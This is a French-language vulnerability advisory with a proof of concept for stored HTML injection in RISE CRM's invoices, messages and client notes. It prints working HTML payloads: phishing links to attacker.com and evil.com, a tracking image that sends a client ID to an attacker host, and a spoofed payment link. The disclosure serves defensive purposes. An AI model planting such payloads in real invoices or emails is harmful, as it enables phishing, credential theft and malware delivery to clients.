
Preuve de concept pour l'injection HTML stockée dans RISE CRM, démontrant comment des utilisateurs authentifiés peuvent injecter du HTML malveillant dans les factures et les messages, conduisant à du hameçonnage et à la distribution de logiciels malveillants via des e-mails et des PDF automatisés.
⚠️ Avis de sécurité
Une vulnérabilité critique d'injection HTML stockée affectant les factures, la messagerie et les communications automatisées
Une vulnérabilité critique d'injection HTML stockée a été découverte dans RISE Ultimate Project Manager & CRM qui permet à des utilisateurs authentifiés d'injecter du HTML malveillant dans les lignes de factures, les notes clients et les modules de messagerie. Ce contenu injecté persiste dans la base de données et est automatiquement rendu dans les e-mails destinés aux clients, les PDF et les communications de chat, permettant des attaques de phishing à grande échelle, une compromission d'e-mails professionnels et la distribution de logiciels malveillants par e-mail/PDF.
| Attribut | Valeur |
|---|---|
| ID CVE | CVE-2025-60378 |
| Type | Injection HTML stockée |
| CWE | CWE-79 |
| Vecteur d'attaque | Réseau/À distance |
| Authentification | Requise (privilèges faibles) |
| Interaction utilisateur | Aucune |
| Gravité | ÉLEVÉE |
| CVSS v3.1 | 8.1 - Élevée |
| Découvreur | Ajansha Shankar |
RISE CRM ne parvient pas à assainir et encoder correctement le contenu HTML dans plusieurs champs modifiables par l'utilisateur, notamment les factures, les messages et les notes clients. Lorsque des utilisateurs authentifiés injectent des charges utiles HTML dans ces champs, le contenu est stocké dans la base de données sans filtrage adéquat. Par la suite, ce HTML malveillant est automatiquement rendu dans les e-mails destinés aux clients, les pièces jointes PDF et les modules de messagerie/chat sans échappement approprié. Les factures récurrentes et la messagerie automatisée amplifient l'attaque en distribuant du contenu malveillant à plusieurs destinataires simultanément.
| Facteur | Impact | Explication |
|---|---|---|
| Confidentialité | 🔴 ÉLEVÉE | Les identifiants clients et les données sensibles peuvent être récoltés via le phishing |
| Intégrité | 🔴 ÉLEVÉE | Le contenu malveillant peut modifier la perception des communications et des relations commerciales |
| Disponibilité | 🟡 FAIBLE | Impact direct limité sur la disponibilité du système |
Un attaquant disposant d'un accès de chef de projet à faibles privilèges crée une facture avec du HTML malveillant :
<a href="https://attacker.com/fake-payment">Cliquez ici pour voir le statut du paiement</a>
La facture est envoyée à plus de 100 clients via un e-mail automatisé. Tous les clients reçoivent ce qui semble être une facture légitime les dirigeant vers un site de phishing. L'attaquant récolte les identifiants de plusieurs victimes simultanément.
Un attaquant injecte du HTML malveillant dans un message client :
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Télécharger les fichiers du projet mis à jour</a>
Tous les membres de l'équipe et les clients reçoivent le message dans leur chat et cliquent sur les liens pour télécharger des logiciels malveillants.
Un attaquant configure une facture récurrente avec une charge utile de distribution de logiciels malveillants. Chaque mois, les clients reçoivent automatiquement des factures contenant du contenu malveillant intégré, fournissant un vecteur d'attaque persistant.
Naviguer vers : Tableau de bord RISE CRM → Factures/Messages → Créer nouveau
<a href="https://attacker.com">Cliquez ici pour voir la facture</a>
<a href="https://evil.com" target="_blank">
<img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
<h1><font color=red>Visitez notre nouveau site Web</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
✅ Le HTML injecté est rendu dans les e-mails, PDF et messageries sans échappement ✅ Les liens sont cliquables et redirigent vers les sites de l'attaquant ✅ Les images se chargent depuis des serveurs contrôlés par l'attaquant ✅ Le contenu persiste dans toutes les futures communications clients ✅ La distribution récurrente atteint plusieurs destinataires automatiquement